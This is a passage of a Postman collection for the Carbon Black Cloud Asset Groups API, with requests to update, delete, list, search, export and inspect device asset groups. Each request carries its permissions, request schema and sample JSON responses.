(ag_agg_key_manual:778ec890dc1c1af1d4bfbf75883a1484fd78f30ca947a8837d994bfcaa559667 AND ag_agg_key_dynamic:002a93942a1bb20b7b80a92fd1739a3f2953f71ea358f35bf19ac233984e392d AND policy_id:7784574 AND policy_override:false)\",\n            \"assets_search_definition\": {\n                \"query\": \"(ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:002a93942a1bb20b7b80a92fd1739a3f2953f71ea358f35bf19ac233984e392d AND policy_id:7784574 AND policy_override:false) OR (ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:c4e9bd76791f48731099dcb99e963aff38666f5533506689fd0f9d6b5d49ff19 AND policy_id:7784574 AND policy_override:false) OR (ag_agg_key_manual:778ec890dc1c1af1d4bfbf75883a1484fd78f30ca947a8837d994bfcaa559667 AND ag_agg_key_dynamic:002a93942a1bb20b7b80a92fd1739a3f2953f71ea358f35bf19ac233984e392d AND policy_id:7784574 AND policy_override:false)\"\n            }\n        },\n        {\n            \"current_policy\": {\n                \"id\": 20578754,\n                \"position\": 3\n            },\n            \"new_policy\": {\n                \"id\": 465946,\n                \"position\": 1\n            },\n            \"asset_count\": 1,\n            \"asset_query\": \"(ag_agg_key_manual:7acb5fb9e807ac1b73ce5ed114f98337ed80e3ff613756ac0cee60c139ce7151 AND ag_agg_key_dynamic:87faf0f835b1b73bebcd347f1c43030f631582feb47612d52a05ad330d8e90dc AND policy_id:20578754 AND policy_override:false)\",\n            \"assets_search_definition\": {\n                \"query\": \"(ag_agg_key_manual:7acb5fb9e807ac1b73ce5ed114f98337ed80e3ff613756ac0cee60c139ce7151 AND ag_agg_key_dynamic:87faf0f835b1b73bebcd347f1c43030f631582feb47612d52a05ad330d8e90dc AND policy_id:20578754 AND policy_override:false)\"\n            }\n        },\n        {\n            \"current_policy\": {\n                \"id\": 19305221,\n                \"position\": 14\n            },\n            \"new_policy\": {\n                \"id\": 465946,\n                \"position\": 1\n            },\n            \"asset_count\": 17,\n            \"asset_query\": \"(ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:3172c9358f785d34651fb5ef52f91621cf859cc4369442656e39326006ab7c10 AND policy_id:19305221 AND policy_override:false) OR (ag_agg_key_manual:778ec890dc1c1af1d4bfbf75883a1484fd78f30ca947a8837d994bfcaa559667 AND ag_agg_key_dynamic:3172c9358f785d34651fb5ef52f91621cf859cc4369442656e39326006ab7c10 AND policy_id:19305221 AND policy_override:false) OR (ag_agg_key_manual:7ec2c5cb39116bccb5934c908a8fdbaae8c9169c42f615b6473f610f3e28054c AND ag_agg_key_dynamic:3172c9358f785d34651fb5ef52f91621cf859cc4369442656e39326006ab7c10 AND policy_id:19305221 AND policy_override:false)\",\n            \"assets_search_definition\": {\n                \"query\": \"(ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:3172c9358f785d34651fb5ef52f91621cf859cc4369442656e39326006ab7c10 AND policy_id:19305221 AND policy_override:false) OR (ag_agg_key_manual:778ec890dc1c1af1d4bfbf75883a1484fd78f30ca947a8837d994bfcaa559667 AND ag_agg_key_dynamic:3172c9358f785d34651fb5ef52f91621cf859cc4369442656e39326006ab7c10 AND policy_id:19305221 AND policy_override:false) OR (ag_agg_key_manual:7ec2c5cb39116bccb5934c908a8fdbaae8c9169c42f615b6473f610f3e28054c AND ag_agg_key_dynamic:3172c9358f785d34651fb5ef52f91621cf859cc4369442656e39326006ab7c10 AND policy_id:19305221 AND policy_override:false)\"\n            }\n        }\n    ]\n}"}],"_postman_id":"212c24d2-859a-4a94-bcfd-4936baa6cb55"},{"name":"Update Asset Group","id":"5e38e3a5-6fde-4918-b397-aa07f6b14079","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"description\": \"Test5 updated\",\n  \"member_type\": \"DEVICE\",\n  \"name\": \"Test5 updated\",\n  \"query\": \"os_version:Windows\",\n  \"policy_id\": 465946\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}","description":"<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#update-asset-group\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"description\": \"&lt;string&gt;\",\n  \"member_type\": \"&lt;string&gt;\",\n  \"name\": \"&lt;string&gt;\",\n  \"query\": \"&lt;string&gt;\",\n  \"policy_id\": &lt;integer&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","{{group_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4b469792-8d10-4cc1-9da1-9aeb8e2aacec","name":"Update Asset Group","originalRequest":{"method":"PUT","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"description\": \"Test5 updated\",\n  \"member_type\": \"DEVICE\",\n  \"name\": \"Test5 updated\",\n  \"query\": \"os_version:Windows\",\n  \"policy_id\": 465946\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/1d6666cb-e554-40b9-81c2-3be7e3da8d16"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:18:15 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"355"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"1d6666cb-e554-40b9-81c2-3be7e3da8d16\",\n    \"name\": \"Test5 updated\",\n    \"description\": \"Test5 updated\",\n    \"org_key\": \"abcd1234\",\n    \"status\": \"OK\",\n    \"member_type\": \"DEVICE\",\n    \"discovered\": false,\n    \"create_time\": \"2023-11-27T17:17:28.683Z\",\n    \"update_time\": \"2023-11-27T17:18:15.695Z\",\n    \"query\": \"os_version:Windows\",\n    \"member_count\": 21,\n    \"policy_id\": 465946,\n    \"policy_name\": \"Testing\"\n}"}],"_postman_id":"5e38e3a5-6fde-4918-b397-aa07f6b14079"},{"name":"Delete Asset Group","id":"350877c9-91fb-4d29-9e21-779efd984a38","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/1d6666cb-e554-40b9-81c2-3be7e3da8d16","description":"<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#delete-asset-group\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","1d6666cb-e554-40b9-81c2-3be7e3da8d16"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b3e46f17-d7cd-4eb1-81cd-5a09318b4d4e","name":"Delete Asset Group","originalRequest":{"method":"DELETE","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/1d6666cb-e554-40b9-81c2-3be7e3da8d16"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:28:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"355"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=AA25F81E4598F81A20B264904956A277; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"1d6666cb-e554-40b9-81c2-3be7e3da8d16\",\n    \"name\": \"Test5 updated\",\n    \"description\": \"Test5 updated\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"OK\",\n    \"member_type\": \"DEVICE\",\n    \"discovered\": false,\n    \"create_time\": \"2023-11-27T17:17:28.683Z\",\n    \"update_time\": \"2023-11-27T17:18:15.695Z\",\n    \"query\": \"os_version:Windows\",\n    \"member_count\": 21,\n    \"policy_id\": 465946,\n    \"policy_name\": \"Testing\"\n}"}],"_postman_id":"350877c9-91fb-4d29-9e21-779efd984a38"},{"name":"Get All Asset Groups","id":"c24060ba-8e63-4fda-9ecc-ff4d07c440b0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups?member_type=DEVICE&rows=2&sort_field=policy_name&sort_order=asc&start=0","description":"<p>Retrieve information about all Asset Groups.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#delete-asset-group\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups"],"host":["{{cb_url}}"],"query":[{"key":"member_type","value":"DEVICE"},{"key":"rows","value":"2"},{"key":"sort_field","value":"policy_name"},{"key":"sort_order","value":"asc"},{"key":"start","value":"0"}],"variable":[]}},"response":[{"id":"52302c48-4542-4bdb-8ba1-62351cb6e40b","name":"Get All Asset Groups","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups?member_type=DEVICE&rows=2&sort_field=policy_name&sort_order=asc&start=0","host":["{{cb_url}}"],"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups"],"query":[{"key":"member_type","value":"DEVICE"},{"key":"rows","value":"2"},{"key":"sort_field","value":"policy_name"},{"key":"sort_order","value":"asc"},{"key":"start","value":"0"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:33:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"716"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=06449668D826616484A15D76DDFEA340; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 51,\n    \"results\": [\n        {\n            \"id\": \"2442bfa3-2ce0-43b5-a323-f79508d60839\",\n            \"name\": \"test\",\n            \"org_key\": \"ABCD1234\",\n            \"status\": \"OK\",\n            \"member_type\": \"DEVICE\",\n            \"discovered\": false,\n            \"create_time\": \"2023-10-10T15:19:08.385Z\",\n            \"update_time\": \"2023-11-14T14:06:06.451Z\",\n            \"query\": \"os.equals: \\\"MAC\\\" AND name: skydive\",\n            \"member_count\": 20,\n            \"policy_id\": 755141,\n            \"policy_name\": \"MacTest\"\n        },\n        {\n            \"id\": \"6459233a-3b5c-4982-9f34-731542524e37\",\n            \"name\": \"Testing\",\n            \"description\": \"Testing\",\n            \"org_key\": \"ABCD1234\",\n            \"status\": \"OK\",\n            \"member_type\": \"DEVICE\",\n            \"discovered\": false,\n            \"create_time\": \"2023-09-21T18:25:26.078Z\",\n            \"update_time\": \"2023-09-21T18:25:26.078Z\",\n            \"member_count\": 52,\n            \"policy_id\": 19305221,\n            \"policy_name\": \"testing\"\n        }\n    ]\n}"}],"_postman_id":"c24060ba-8e63-4fda-9ecc-ff4d07c440b0"},{"name":"Search for Asset Groups","id":"e63e5852-e435-476a-a291-3d9290993499","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"query\": \"<string>\",\n  \"criteria\": {\n    \"discovered\": [<boolean>],\n    \"name\": [\"<string>\"],\n    \"policy_id\": [<integer>],\n    \"group_id\": [\"<string>\"],\n  },\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/_search","description":"<p>Search for Asset Groups that match specified criteria.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#search-for-asset-groups\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"discovered\": [&lt;boolean&gt;],\n    \"name\": [\"&lt;string&gt;\"],\n    \"policy_id\": [&lt;integer&gt;],\n    \"group_id\": [\"&lt;string&gt;\"],\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ad2193bf-9398-41f9-abec-8b99a18ccf2e","name":"Search for Asset Groups","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"policy_id\": [\n      465946\n    ]\n  },\n  \"query\": \"test\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:39:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1055"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=0D30E4CDA1EF9B0B21697A9FC9B97A4B; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 3,\n    \"results\": [\n        {\n            \"id\": \"f2004957-ca49-4c77-921f-8dd70c9c1185\",\n            \"name\": \"Test5\",\n            \"description\": \"Test5\",\n            \"org_key\": \"abcd1234\",\n            \"status\": \"OK\",\n            \"member_type\": \"DEVICE\",\n            \"discovered\": false,\n            \"create_time\": \"2023-11-27T17:06:37.578Z\",\n            \"update_time\": \"2023-11-27T17:06:38.226Z\",\n            \"query\": \"os_version:Windows\",\n            \"member_count\": 21,\n            \"policy_id\": 465946,\n            \"policy_name\": \"Pscr SE Testing\"\n        },\n        {\n            \"id\": \"5ba65b7b-843d-438a-9182-85f3c16a971a\",\n            \"name\": \"Asset Group #1\",\n            \"org_key\": \"abcd1234\",\n            \"status\": \"OK\",\n            \"member_type\": \"DEVICE\",\n            \"discovered\": false,\n            \"create_time\": \"2023-09-20T16:29:32.186Z\",\n            \"update_time\": \"2023-10-04T09:27:11.934Z\",\n            \"query\": \"os.equals: \\\"WINDOWS\\\"\",\n            \"member_count\": 185,\n            \"policy_id\": 465946,\n            \"policy_name\": \"Pscr SE Testing\"\n        },\n        {\n            \"id\": \"586f4f57-5cee-402f-9faf-0c98e0459cee\",\n            \"name\": \"Limit test group 21\",\n            \"org_key\": \"abcd1234\",\n            \"status\": \"OK\",\n            \"member_type\": \"DEVICE\",\n            \"discovered\": false,\n            \"create_time\": \"2023-10-30T13:57:17.185Z\",\n            \"update_time\": \"2023-11-15T16:50:29.317Z\",\n            \"query\": \"last_internal_ip_address: 10.10.210.16\\\\/28\",\n            \"member_count\": 1,\n            \"policy_id\": 465946,\n            \"policy_name\": \"Pscr SE Testing\"\n        }\n    ]\n}"}],"_postman_id":"e63e5852-e435-476a-a291-3d9290993499"},{"name":"Export Asset Groups","id":"2286ded2-a5fa-492c-baba-179286f1106a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"query\": \"<string>\",\n  \"criteria\": {\n    \"discovered\": [<boolean>],\n    \"name\": [\"<string>\"],\n    \"policy_id\": [<integer>],\n    \"group_id\": [\"<string>\"],\n  },\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ],\n  \"format\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/_export","description":"<p>Export Asset Groups that match specified criteria.</p>\n<p>To receive the actual JSON or CSV results, you need to use the <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a>. First, use the <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-details\">Get Job Details</a> to get the status of the async job, then <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/#download-job-output\">Download Job Output</a> call to download the actual content.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#export-asset-groups\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"discovered\": [&lt;boolean&gt;],\n    \"name\": [\"&lt;string&gt;\"],\n    \"policy_id\": [&lt;integer&gt;],\n    \"group_id\": [\"&lt;string&gt;\"],\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ],\n  \"format\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2c6259d3-a9fe-4422-bbf6-082bda06a9d5","name":"Export Asset Groups","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"policy_id\": [\n      465946\n    ]\n  },\n  \"query\": \"test\",\n  \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/_export"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:39:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1055"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=0D30E4CDA1EF9B0B21697A9FC9B97A4B; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 6031024\n}"}],"_postman_id":"2286ded2-a5fa-492c-baba-179286f1106a"},{"name":"Get Asset Group by ID","id":"bf491e95-e0ce-4a67-8d6c-f0a4a85c85a9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}","description":"<p>Retrieve information about all Asset Groups.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#get-asset-group-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","{{group_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"30c7e21e-3620-4952-b3ce-3058505110c4","name":"Get Asset Group by ID","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/2442bfa3-2ce0-43b5-a323-f79508d60839"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:44:50 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"328"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"2442bfa3-2ce0-43b5-a323-f79508d60839\",\n    \"name\": \"test\",\n    \"org_key\": \"abcd1234\",\n    \"status\": \"OK\",\n    \"member_type\": \"DEVICE\",\n    \"discovered\": false,\n    \"create_time\": \"2023-10-10T15:19:08.385Z\",\n    \"update_time\": \"2023-11-14T14:06:06.451Z\",\n    \"query\": \"os.equals: \\\"MAC\\\" AND name: skydive\",\n    \"member_count\": 20,\n    \"policy_id\": 755141,\n    \"policy_name\": \"MacTest\"\n}"}],"_postman_id":"bf491e95-e0ce-4a67-8d6c-f0a4a85c85a9"},{"name":"Get Asset Group Stats","id":"f86cfd16-68ea-4a6e-9ac3-800542fa705f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/{{group_id}}/membership_summary","description":"<p>For a given group, return counts of how many of its members belong to other groups, and counts of how many members belong to groups without Policy association.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>group-management</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/asset-groups-api/#get-asset-group-stats\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["asset_groups","v1","orgs","{{cb_org_key}}","groups","{{group_id}}","membership_summary"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"927e5e3b-7d89-48f9-a3e2-ea012f11f8b8","name":"Get Asset Group Stats","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/asset_groups/v1/orgs/{{cb_org_key}}/groups/2442bfa3-2ce0-43b5-a323-f79508d60839/membership_summary"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 27 Nov 2023 17:48:39 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1346"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=CFE232367EFE266096D868864FF71999; Path=/asset_groups; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"intersections\": [\n        {\n            \"count\": 19,\n            \"ids\": [\n                \"19242056\",\n                \"19242095\",\n                \"19242200\",\n                \"19242311\",\n                \"19242797\",\n                \"19243208\",\n                \"19243414\",\n                \"19243648\",\n                \"19243656\",\n                \"19243721\",\n                \"19243737\",\n                \"19243754\",\n                \"19244090\",\n                \"19244266\",\n                \"19244345\",\n                \"19244582\",\n                \"19244773\",\n                \"19244837\",\n                \"19245056\"\n            ],\n            \"group_id\": \"ef34e934-83eb-45cd-aba7-9a86b31a8d71\",\n            \"group_name\": \"test 